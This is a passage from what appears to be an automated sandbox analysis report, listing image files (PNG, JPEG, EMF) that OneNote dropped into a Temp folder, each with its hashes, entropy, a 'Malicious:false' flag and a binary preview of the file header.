                                                                                                  Category:dropped
                                                                                                  Size (bytes):4181
                                                                                                  Entropy (8bit):7.943341403425058
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                  MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                  SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                  SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                  SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj*.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b.*..%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....|=.#.=.32..o.<.Tn*Q....g.zN...n*...!/.........!....F..]...6...m...CX..~...+..U...E.|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}..*...N...N.|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.*+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..

                                                                                                  C:\Users\user\AppData\Local\Temp\{DE443F81-481A-4F98-BFC0-D21AB0A4D12A}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:05:55], progressive, precision 8, 612x618, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):68633
                                                                                                  Entropy (8bit):7.709776384921022
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:tapXpSTJDOkFGdJdBk/slsbfsw1imaapnbvD8:U2OjJr6b07m1bvD8
                                                                                                  MD5:41241EE59AB7BC9EB34784E3BCE31CB4
                                                                                                  SHA1:98680761A51E9199CF3C89F68B5309FBEC7EE3CB
                                                                                                  SHA-256:035B26DF61855A3F36DBD30FDAB0C157C04C9E8AE2197EA4D4AEB3E82E6A4C2B
                                                                                                  SHA-512:3EE331D5BCEE4AD5D3FC9661D4AB4053F7D351591A094334F963C33C9D0E32CCCABE9334AD7C308108CE99617E064FE848DCD469ACD8D83FBE5C4452DE523D8F
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:05:55.............................d...........j...........................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?../$.W:SZ./...9.....-...u......r.....].c...@W_.7...+......v.+PD.I..-<1.pDn-\.....p.$....0.}V....\..>.~..XN.o..l(E....ik..o.

                                                                                                  C:\Users\user\AppData\Local\Temp\{DEC058F5-1D8B-4D0B-A042-477F69EADB81}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):13737
                                                                                                  Entropy (8bit):7.916899917415529
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                  MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                  SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                  SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                  SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.

                                                                                                  C:\Users\user\AppData\Local\Temp\{E0F8A780-D888-4A84-AB65-A1FB54940175}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                  Category:dropped
                                                                                                  Size (bytes):32656
                                                                                                  Entropy (8bit):3.9517299510231485
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:qR0eV0V6zLq8fAy7TtS1O6VILpjH5og6NJgnIuu57aqP+Tg3QePV2P6hqaJDyjJg:qlzzaRpbd1
                                                                                                  MD5:DD4CA4BC0A73FCB71BEBAA3C29CB8F66
                                                                                                  SHA1:1A7085771D7941540EC94A1BD24D7CC8EA556D4B
                                                                                                  SHA-256:0401451E1D1D7DFDC29AD1B2B68A6C8AC0B706E9868BF22FAB26A01CD48620CE
                                                                                                  SHA-512:5B7D386C46EC75E21DE94DBCA922FB9A6E5358DEB3D60FEEE7B197D739F15D11050825D9323502EDFAF60720F1074DE896B23E71C44D07C9C7E943C31FDC078A
                                                                                                  Malicious:false
                                                                                                  Preview:....l...r...1...*...^...bX.......^...... EMF........h...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC....s...2...+...^.......F...(.......GDIC....s...2.......N.......F...........EMF+*@..$..........?...........?.........@........................(E..HB.'E..HB.0'EI.`B.0'EU5.B.0'E..B.'EU5.B..(EU5.B.(EU5.B..(E..B..(EU5.B..(EI.`B.(E..HB..(E..HB.................@..............!.......b...........$...$......>...........>............'......................%.......................;.......U...P........................T...S...S...S...S8..Si..Ti.@Ti.qT8.qT..qT..@T...T..<.......>.......r...1.......N...............%...........$...$......A...........A............"...........F...........EMF+.@..........F...........GDIC....F...(.......GDIC........2.......N.......F...........EMF+*@..$..........?...........?.........@.......................}*E

                                                                                                  C:\Users\user\AppData\Local\Temp\{E18618EB-DE43-4EFC-8DF0-F7D1D0B9F1DD}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):13084
                                                                                                  Entropy (8bit):7.940058639272698
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                  MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                  SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                  SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                  SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1

                                                                                                  C:\Users\user\AppData\Local\Temp\{E1AA262C-AD95-4EBE-A7ED-E0BE6AC52FBF}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1604
                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                  C:\Users\user\AppData\Local\Temp\{E1E97801-3538-4A14-B99A-AAC6F2B40894}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2332
                                                                                                  Entropy (8bit):7.8822150338370776
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                  MD5:91CB7F1273AA003076401081B8A22237
                                                                                                  SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                  SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                  SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n

                                                                                                  C:\Users\user\AppData\Local\Temp\{E21D737D-3A18-43C0-A662-63DD1A56919A}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):14553
                                                                                                  Entropy (8bit):7.951135681293377
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                  MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                  SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                  SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                  SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..|.]....s.6[..H...N@.=M..|`...3./...I.....'..|..K...r|...nX...'.. .G...ib|...MY8|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K*.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.|....?.^..5^}..$.. .....S.@...*<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...|....W<{...g.&'Ca

                                                                                                  C:\Users\user\AppData\Local\Temp\{E2BB813E-1016-4987-8874-7C27E6F07A7C}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 105x441, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2268
                                                                                                  Entropy (8bit):7.384274251000273
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:N9YMn9H5gXlM26vroVXWxyNnl1LmLR+rn4FOeewGhDbby:/h9SlMdgm09ll8R2/rby
                                                                                                  MD5:09A7AE94AA8E517298A9618A13D6E0E2
                                                                                                  SHA1:FA5181A7414BA32F816BF0C4278EC20C615E8B1A
                                                                                                  SHA-256:3C68C7EE798E62A4A99C740153F3980D7DF029605C843410942C7F85E794823B
                                                                                                  SHA-512:074E9A2BE2039D0AFEAD360157550B934FABD0CB86B5AF476C1FBC885EE60331F5A68EAF70BF76E23C8248A20FB900346839F4AA8892370B5889E64948DCC6E2
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222........i..".......................................3......................!.A..1Q."q.2BRa.b...#$................................... .......................!12AqQ.............?..D.z.4....;.....7...3.t<!..d.O.....+O+.;.z6.4cz7E.........U.Z)-..@..y...........}(W...<.xv/...5.ew......yN....n.Tk.Tm.Ty.vA=...T..U....h...e.8.5%....'......e^......L.g.$.~e..O.._...... .F`.....xnL.<.......]jfv...}..\G..c.......-%...#.C.|.].`..^..W..c..B..5D.QSTaZ.5A=....BU..z%.4.h.6..=..U...W.$..l...7.:...........IPQT_...~..i..x....~.l.|.n.J..TV.21.Tg.....................j.z!+.-............"j.j...)*..TT...."....T.Tc.**j..............j.z!*.h...&.&.&..e.%..TksTW%G.?".l+$..c._9..[x...TU..........i~X..#'.qm?ttO.....}*.i...q.....9..r..?..W..d.w...f;..q...tZh..0.....2.......OD%Q-.......$......56.K.O...y._..*_C.k..p9.p..O..vu...'........0v

                                                                                                  C:\Users\user\AppData\Local\Temp\{E2D3AE7D-05A5-458D-98BC-A4F909290E08}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):16003
                                                                                                  Entropy (8bit):7.959532793770661
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                  MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                  SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                  SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                  SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..|.....+)..H..C.K... ....x).rU..T..*E...;....*.@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z*.GJ...."@zJ}...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[||...t.T.w *.. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...

                                                                                                  C:\Users\user\AppData\Local\Temp\{E402FAC2-89E1-4EF9-9008-4E7B422DA86D}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4081
                                                                                                  Entropy (8bit):7.943373267196131
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                  MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                  SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                  SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                  SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a.......*.....k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5...*.F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....*zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U*.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.*.* 8T=/'9,*.KDW...GN;0(P3_....1......'.;..;|.L.a.&<*\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b

                                                                                                  C:\Users\user\AppData\Local\Temp\{E63977C0-4E75-465D-9962-44C69531F536}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 171 x 552, 8-bit colormap, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):10056
                                                                                                  Entropy (8bit):7.956064700093514
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:edmu1fpj5DVHuooK4EpGLbAdT+dBXYBR8D1V2p6KwoPR6KUX9ojwRpgA:2Pp/B4LbAF+dBo/1E3S6JScpgA
                                                                                                  MD5:E1B57A8851177DD25DC05B50B904656A
                                                                                                  SHA1:96D2E31A325322F2720722973814D2CAED23D546
                                                                                                  SHA-256:2035407A0540E1C4F7934DB08BA4ADD750FCB9A62863DDD9553E7871C81A99E3
                                                                                                  SHA-512:BC7DC1201884E6DAFDC1F9D8E32656BFAEE0BB4905835E09B65299FE2D7C064B27EAA10B531F9BECF970C986E89A5FD8A0B83F508BBA34EB4E38B3F7F5FC623A
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......(.....!..t....PLTE.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................4.....bKGD....H....cmPPJCmp0712....H.s...#.IDATx^.w`......$..B....... ....fz5..6`l\.8...Nsz{.//y./....{.7}g.....e.....~.......s...f.....%c...6....O.PJ...Y.oi...9..'j.2..6.-

                                                                                                  C:\Users\user\AppData\Local\Temp\{E6498699-DE1A-4D2C-832C-49E5212C405A}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 14x341, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):3361
                                                                                                  Entropy (8bit):7.619405839796034
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:zDqnxqMt6gGr/Nln5ANln5ANln5ANln5ANln5ANln5ANln5ANllHN6:CxqMQr/rn5Arn5Arn5Arn5Arn5Arn5AN
                                                                                                  MD5:A994063FF2ABEB78917C5382B2F5FA8C
                                                                                                  SHA1:BD5C4D816B04A2B6596DFE38DB01228F553FACCC
                                                                                                  SHA-256:D72900E8DA72D1A7F3729971AA558E1E9B6E9CF9A0D51E83852E567256DBBFEF
                                                                                                  SHA-512:CF2279033DD3EDFE6F6F9E5C517BEBD9A52863EEFD90F57F7A5AE0E0485E705254BE7ED6B50E6CA142669687727AE85E2E6035F69930B75F2E6D3EEFA961EF88
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....H.H.....C....................................................................C.......................................................................U..........................................>...............................8H........59...$%&7F#'Ddf.....................................>.................................58EG........!#124$%&ACFbcde............?...n.p..v..a.~.._.>......#....8.....w.G...&.W...i...%6m..K;...4."...=..?.~......P..O...j.l..AW.jo..,..=d.h.ta..../.."...z|).J.......Ww._..<Wp.3+8...-5...G:..2.D..I>o..K.F;-.....#...`...6..T...M.....OOgV~..5...np...P..TYr...........b..{r.2.9..].DA.%C....=.v.z......CK."..R..l..y}.i..;.{....JzS.....~.?..Z....=c.h~*..p.@(@..G.....O.]...Hsd.xf".V]..S"..w...4e>....3*U.7..|M.x...|\......FD./.cIe.;.bId..+=...w.......[.k>....}.u...j.xZ.....Q4..+.....B....1O~\......I..h....LaXJ%&.w.<C...n/`.W..U.W.U.}~...}>..^.0.J.....@....LN.b.......5W...m].Eu...:....G..:4.=4ixx..@_0=.mab.T.U.....w..~.V.

                                                                                                  C:\Users\user\AppData\Local\Temp\{E8F4F66D-D5C9-4670-8A30-D3331F2E7336}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1924
                                                                                                  Entropy (8bit):7.836744258175623
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                  MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                  SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                  SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                  SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                  Malicious:false
